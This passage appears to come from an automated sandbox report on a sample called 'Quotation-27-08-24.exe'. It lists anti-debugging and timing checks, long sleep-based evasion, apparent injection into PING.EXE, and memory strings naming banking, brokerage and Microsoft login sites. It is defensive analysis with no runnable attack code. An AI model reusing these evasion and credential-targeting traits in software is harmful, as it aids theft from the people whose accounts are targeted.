            Source: C:\Users\user\Desktop\Quotation-27-08-24.exe Memory allocated: 2E00000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exe Memory allocated: 2CF0000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exe Memory allocated: 77D0000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exe Memory allocated: 87D0000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exe Memory allocated: 8970000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exe Memory allocated: 6F50000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exe Memory allocated: 9B40000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exe Code function: 4_2_00FA096E rdtsc
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exe Thread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\PING.EXE Window / User API: threadDelayed 9837
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exe API coverage: 0.7 %
            Source: C:\Windows\SysWOW64\PING.EXE API coverage: 2.4 %
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exe TID: 6720 Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exe TID: 2884 Thread sleep time: -80000s >= -30000s
            Source: C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exe TID: 2884 Thread sleep count: 40 > 30
            Source: C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exe TID: 2884 Thread sleep time: -60000s >= -30000s
            Source: C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exe TID: 2884 Thread sleep count: 39 > 30
            Source: C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exe TID: 2884 Thread sleep time: -39000s >= -30000s
            Source: C:\Windows\SysWOW64\PING.EXE TID: 2528 Thread sleep count: 135 > 30
            Source: C:\Windows\SysWOW64\PING.EXE TID: 2528 Thread sleep time: -270000s >= -30000s
            Source: C:\Windows\SysWOW64\PING.EXE TID: 2528 Thread sleep count: 9837 > 30
            Source: C:\Windows\SysWOW64\PING.EXE TID: 2528 Thread sleep time: -19674000s >= -30000s
            Source: C:\Windows\SysWOW64\PING.EXE Last function: Thread delayed
            Source: C:\Windows\SysWOW64\PING.EXE Code function: 9_2_0048C010 FindFirstFileW,FindNextFileW,FindClose
            Source: Z426iIL7.9.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
            Source: Z426iIL7.9.dr Binary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
            Source: Z426iIL7.9.dr Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
            Source: Z426iIL7.9.dr Binary or memory string: discord.comVMware20,11696487552f
            Source: Z426iIL7.9.dr Binary or memory string: bankofamerica.comVMware20,11696487552x
            Source: Z426iIL7.9.dr Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
            Source: Z426iIL7.9.dr Binary or memory string: ms.portal.azure.comVMware20,11696487552
            Source: Z426iIL7.9.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
            Source: Z426iIL7.9.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
            Source: Z426iIL7.9.dr Binary or memory string: global block list test formVMware20,11696487552
            Source: Z426iIL7.9.dr Binary or memory string: tasks.office.comVMware20,11696487552o
            Source: Z426iIL7.9.dr Binary or memory string: AMC password management pageVMware20,11696487552
            Source: uExImirYECsTjI.exe, 00000008.00000002.4565784664.000000000082E000.00000004.00000020.00020000.00000000.sdmp, PING.EXE, 00000009.00000002.4566598381.00000000006BE000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000000C.00000002.2756714639.000002C3BF3EC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: Z426iIL7.9.dr Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
            Source: Z426iIL7.9.dr Binary or memory string: interactivebrokers.comVMware20,11696487552
            Source: Z426iIL7.9.dr Binary or memory string: dev.azure.comVMware20,11696487552j
            Source: Z426iIL7.9.dr Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
            Source: Z426iIL7.9.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
            Source: Z426iIL7.9.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
            Source: Z426iIL7.9.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
            Source: Z426iIL7.9.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
            Source: Z426iIL7.9.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
            Source: Z426iIL7.9.dr Binary or memory string: outlook.office365.comVMware20,11696487552t
            Source: Z426iIL7.9.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
            Source: Quotation-27-08-24.exe, 00000000.00000002.2132326848.0000000009AB0000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: ao5Z9vmCIX
            Source: Z426iIL7.9.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
            Source: Z426iIL7.9.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
            Source: Z426iIL7.9.dr Binary or memory string: outlook.office.comVMware20,11696487552s
            Source: Z426iIL7.9.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
            Source: Z426iIL7.9.dr Binary or memory string: turbotax.intuit.comVMware20,11696487552t
            Source: Z426iIL7.9.dr Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
            Source: Z426iIL7.9.dr Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
            Source: Z426iIL7.9.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exe Process information queried: ProcessInformation
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exe Process queried: DebugPort
            Source: C:\Windows\SysWOW64\PING.EXE Process queried: DebugPort
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exe Code function: 4_2_00FA096E rdtsc
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exe Code function: 4_2_00417583 LdrLoadDll
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FF4144 mov eax, dword ptr fs:[00000030h]4_2_00FF4144
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FF4144 mov eax, dword ptr fs:[00000030h]4_2_00FF4144
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F90124 mov eax, dword ptr fs:[00000030h]4_2_00F90124
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F702E1 mov eax, dword ptr fs:[00000030h]4_2_00F702E1
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F702E1 mov eax, dword ptr fs:[00000030h]4_2_00F702E1
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F702E1 mov eax, dword ptr fs:[00000030h]4_2_00F702E1
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F6A2C3 mov eax, dword ptr fs:[00000030h]4_2_00F6A2C3
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F6A2C3 mov eax, dword ptr fs:[00000030h]4_2_00F6A2C3
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F6A2C3 mov eax, dword ptr fs:[00000030h]4_2_00F6A2C3
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F6A2C3 mov eax, dword ptr fs:[00000030h]4_2_00F6A2C3
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F6A2C3 mov eax, dword ptr fs:[00000030h]4_2_00F6A2C3
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_0102A352 mov eax, dword ptr fs:[00000030h]4_2_0102A352
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_01008350 mov ecx, dword ptr fs:[00000030h]4_2_01008350
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FF62A0 mov eax, dword ptr fs:[00000030h]4_2_00FF62A0
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FF62A0 mov ecx, dword ptr fs:[00000030h]4_2_00FF62A0
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FF62A0 mov eax, dword ptr fs:[00000030h]4_2_00FF62A0
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FF62A0 mov eax, dword ptr fs:[00000030h]4_2_00FF62A0
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FF62A0 mov eax, dword ptr fs:[00000030h]4_2_00FF62A0
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FF62A0 mov eax, dword ptr fs:[00000030h]4_2_00FF62A0
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_0100437C mov eax, dword ptr fs:[00000030h]4_2_0100437C
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FE0283 mov eax, dword ptr fs:[00000030h]4_2_00FE0283
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FE0283 mov eax, dword ptr fs:[00000030h]4_2_00FE0283
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FE0283 mov eax, dword ptr fs:[00000030h]4_2_00FE0283
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F9E284 mov eax, dword ptr fs:[00000030h]4_2_00F9E284
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F9E284 mov eax, dword ptr fs:[00000030h]4_2_00F9E284
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F64260 mov eax, dword ptr fs:[00000030h]4_2_00F64260
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F64260 mov eax, dword ptr fs:[00000030h]4_2_00F64260
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F64260 mov eax, dword ptr fs:[00000030h]4_2_00F64260
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F5826B mov eax, dword ptr fs:[00000030h]4_2_00F5826B
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F5A250 mov eax, dword ptr fs:[00000030h]4_2_00F5A250
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F66259 mov eax, dword ptr fs:[00000030h]4_2_00F66259
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FE8243 mov eax, dword ptr fs:[00000030h]4_2_00FE8243
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FE8243 mov ecx, dword ptr fs:[00000030h]4_2_00FE8243
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_0101C3CD mov eax, dword ptr fs:[00000030h]4_2_0101C3CD
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F5823B mov eax, dword ptr fs:[00000030h]4_2_00F5823B
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_010043D4 mov eax, dword ptr fs:[00000030h]4_2_010043D4
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_010043D4 mov eax, dword ptr fs:[00000030h]4_2_010043D4
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_0100E3DB mov eax, dword ptr fs:[00000030h]4_2_0100E3DB
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_0100E3DB mov eax, dword ptr fs:[00000030h]4_2_0100E3DB
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_0100E3DB mov ecx, dword ptr fs:[00000030h]4_2_0100E3DB
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_0100E3DB mov eax, dword ptr fs:[00000030h]4_2_0100E3DB
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F963FF mov eax, dword ptr fs:[00000030h]4_2_00F963FF
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F7E3F0 mov eax, dword ptr fs:[00000030h]4_2_00F7E3F0
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F7E3F0 mov eax, dword ptr fs:[00000030h]4_2_00F7E3F0
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F7E3F0 mov eax, dword ptr fs:[00000030h]4_2_00F7E3F0
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F703E9 mov eax, dword ptr fs:[00000030h]4_2_00F703E9
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F703E9 mov eax, dword ptr fs:[00000030h]4_2_00F703E9
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F703E9 mov eax, dword ptr fs:[00000030h]4_2_00F703E9
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F703E9 mov eax, dword ptr fs:[00000030h]4_2_00F703E9
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F703E9 mov eax, dword ptr fs:[00000030h]4_2_00F703E9
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F703E9 mov eax, dword ptr fs:[00000030h]4_2_00F703E9
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F703E9 mov eax, dword ptr fs:[00000030h]4_2_00F703E9
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F703E9 mov eax, dword ptr fs:[00000030h]4_2_00F703E9
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F683C0 mov eax, dword ptr fs:[00000030h]4_2_00F683C0
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F683C0 mov eax, dword ptr fs:[00000030h]4_2_00F683C0
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F683C0 mov eax, dword ptr fs:[00000030h]4_2_00F683C0
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F683C0 mov eax, dword ptr fs:[00000030h]4_2_00F683C0
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F6A3C0 mov eax, dword ptr fs:[00000030h]4_2_00F6A3C0
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F6A3C0 mov eax, dword ptr fs:[00000030h]4_2_00F6A3C0
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F6A3C0 mov eax, dword ptr fs:[00000030h]4_2_00F6A3C0
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F6A3C0 mov eax, dword ptr fs:[00000030h]4_2_00F6A3C0
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F6A3C0 mov eax, dword ptr fs:[00000030h]4_2_00F6A3C0
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F6A3C0 mov eax, dword ptr fs:[00000030h]4_2_00F6A3C0
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FE63C0 mov eax, dword ptr fs:[00000030h]4_2_00FE63C0
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_0101A250 mov eax, dword ptr fs:[00000030h]4_2_0101A250
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_0101A250 mov eax, dword ptr fs:[00000030h]4_2_0101A250
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F58397 mov eax, dword ptr fs:[00000030h]4_2_00F58397
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F58397 mov eax, dword ptr fs:[00000030h]4_2_00F58397
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F58397 mov eax, dword ptr fs:[00000030h]4_2_00F58397
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_01010274 mov eax, dword ptr fs:[00000030h]4_2_01010274
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_01010274 mov eax, dword ptr fs:[00000030h]4_2_01010274
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_01010274 mov eax, dword ptr fs:[00000030h]4_2_01010274
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_01010274 mov eax, dword ptr fs:[00000030h]4_2_01010274
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_01010274 mov eax, dword ptr fs:[00000030h]4_2_01010274
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_01010274 mov eax, dword ptr fs:[00000030h]4_2_01010274
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_01010274 mov eax, dword ptr fs:[00000030h]4_2_01010274
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_01010274 mov eax, dword ptr fs:[00000030h]4_2_01010274
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_01010274 mov eax, dword ptr fs:[00000030h]4_2_01010274
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_01010274 mov eax, dword ptr fs:[00000030h]4_2_01010274
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_01010274 mov eax, dword ptr fs:[00000030h]4_2_01010274
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_01010274 mov eax, dword ptr fs:[00000030h]4_2_01010274
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F8438F mov eax, dword ptr fs:[00000030h]4_2_00F8438F
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F8438F mov eax, dword ptr fs:[00000030h]4_2_00F8438F
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F5E388 mov eax, dword ptr fs:[00000030h]4_2_00F5E388
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F5E388 mov eax, dword ptr fs:[00000030h]4_2_00F5E388
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F5E388 mov eax, dword ptr fs:[00000030h]4_2_00F5E388
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FE035C mov eax, dword ptr fs:[00000030h]4_2_00FE035C
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FE035C mov eax, dword ptr fs:[00000030h]4_2_00FE035C
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FE035C mov eax, dword ptr fs:[00000030h]4_2_00FE035C
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FE035C mov ecx, dword ptr fs:[00000030h]4_2_00FE035C
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FE035C mov eax, dword ptr fs:[00000030h]4_2_00FE035C
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FE035C mov eax, dword ptr fs:[00000030h]4_2_00FE035C
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FE2349 mov eax, dword ptr fs:[00000030h]4_2_00FE2349
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FE2349 mov eax, dword ptr fs:[00000030h]4_2_00FE2349
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FE2349 mov eax, dword ptr fs:[00000030h]4_2_00FE2349
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FE2349 mov eax, dword ptr fs:[00000030h]4_2_00FE2349
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FE2349 mov eax, dword ptr fs:[00000030h]4_2_00FE2349
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FE2349 mov eax, dword ptr fs:[00000030h]4_2_00FE2349
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FE2349 mov eax, dword ptr fs:[00000030h]4_2_00FE2349
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FE2349 mov eax, dword ptr fs:[00000030h]4_2_00FE2349
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FE2349 mov eax, dword ptr fs:[00000030h]4_2_00FE2349
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FE2349 mov eax, dword ptr fs:[00000030h]4_2_00FE2349
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FE2349 mov eax, dword ptr fs:[00000030h]4_2_00FE2349
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FE2349 mov eax, dword ptr fs:[00000030h]4_2_00FE2349
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FE2349 mov eax, dword ptr fs:[00000030h]4_2_00FE2349
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FE2349 mov eax, dword ptr fs:[00000030h]4_2_00FE2349
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FE2349 mov eax, dword ptr fs:[00000030h]4_2_00FE2349
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F5C310 mov ecx, dword ptr fs:[00000030h]4_2_00F5C310
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F80310 mov ecx, dword ptr fs:[00000030h]4_2_00F80310
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F9A30B mov eax, dword ptr fs:[00000030h]4_2_00F9A30B
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F9A30B mov eax, dword ptr fs:[00000030h]4_2_00F9A30B
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F9A30B mov eax, dword ptr fs:[00000030h]4_2_00F9A30B
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_01034500 mov eax, dword ptr fs:[00000030h]4_2_01034500
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_01034500 mov eax, dword ptr fs:[00000030h]4_2_01034500
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_01034500 mov eax, dword ptr fs:[00000030h]4_2_01034500
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_01034500 mov eax, dword ptr fs:[00000030h]4_2_01034500
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_01034500 mov eax, dword ptr fs:[00000030h]4_2_01034500
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_01034500 mov eax, dword ptr fs:[00000030h]4_2_01034500
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_01034500 mov eax, dword ptr fs:[00000030h]4_2_01034500
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F604E5 mov ecx, dword ptr fs:[00000030h]4_2_00F604E5
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F944B0 mov ecx, dword ptr fs:[00000030h]4_2_00F944B0
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FEA4B0 mov eax, dword ptr fs:[00000030h]4_2_00FEA4B0
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F664AB mov eax, dword ptr fs:[00000030h]4_2_00F664AB
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F8A470 mov eax, dword ptr fs:[00000030h]4_2_00F8A470
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F8A470 mov eax, dword ptr fs:[00000030h]4_2_00F8A470
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F8A470 mov eax, dword ptr fs:[00000030h]4_2_00F8A470
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FEC460 mov ecx, dword ptr fs:[00000030h]4_2_00FEC460
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F8245A mov eax, dword ptr fs:[00000030h]4_2_00F8245A
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F5645D mov eax, dword ptr fs:[00000030h]4_2_00F5645D
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F9E443 mov eax, dword ptr fs:[00000030h]4_2_00F9E443
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F9E443 mov eax, dword ptr fs:[00000030h]4_2_00F9E443
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F9E443 mov eax, dword ptr fs:[00000030h]4_2_00F9E443
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F9E443 mov eax, dword ptr fs:[00000030h]4_2_00F9E443
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F9E443 mov eax, dword ptr fs:[00000030h]4_2_00F9E443
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F9E443 mov eax, dword ptr fs:[00000030h]4_2_00F9E443
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F9E443 mov eax, dword ptr fs:[00000030h]4_2_00F9E443
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F9E443 mov eax, dword ptr fs:[00000030h]4_2_00F9E443
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F9A430 mov eax, dword ptr fs:[00000030h]4_2_00F9A430
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F5C427 mov eax, dword ptr fs:[00000030h]4_2_00F5C427
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F5E420 mov eax, dword ptr fs:[00000030h]4_2_00F5E420
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F5E420 mov eax, dword ptr fs:[00000030h]4_2_00F5E420
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F5E420 mov eax, dword ptr fs:[00000030h]4_2_00F5E420
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FE6420 mov eax, dword ptr fs:[00000030h]4_2_00FE6420
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FE6420 mov eax, dword ptr fs:[00000030h]4_2_00FE6420
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FE6420 mov eax, dword ptr fs:[00000030h]4_2_00FE6420
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FE6420 mov eax, dword ptr fs:[00000030h]4_2_00FE6420
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FE6420 mov eax, dword ptr fs:[00000030h]4_2_00FE6420
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FE6420 mov eax, dword ptr fs:[00000030h]4_2_00FE6420
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FE6420 mov eax, dword ptr fs:[00000030h]4_2_00FE6420
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F98402 mov eax, dword ptr fs:[00000030h]4_2_00F98402
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F98402 mov eax, dword ptr fs:[00000030h]4_2_00F98402
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F98402 mov eax, dword ptr fs:[00000030h]4_2_00F98402
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F9C5ED mov eax, dword ptr fs:[00000030h]4_2_00F9C5ED
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F9C5ED mov eax, dword ptr fs:[00000030h]4_2_00F9C5ED
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F625E0 mov eax, dword ptr fs:[00000030h]4_2_00F625E0
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F8E5E7 mov eax, dword ptr fs:[00000030h]4_2_00F8E5E7
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F8E5E7 mov eax, dword ptr fs:[00000030h]4_2_00F8E5E7
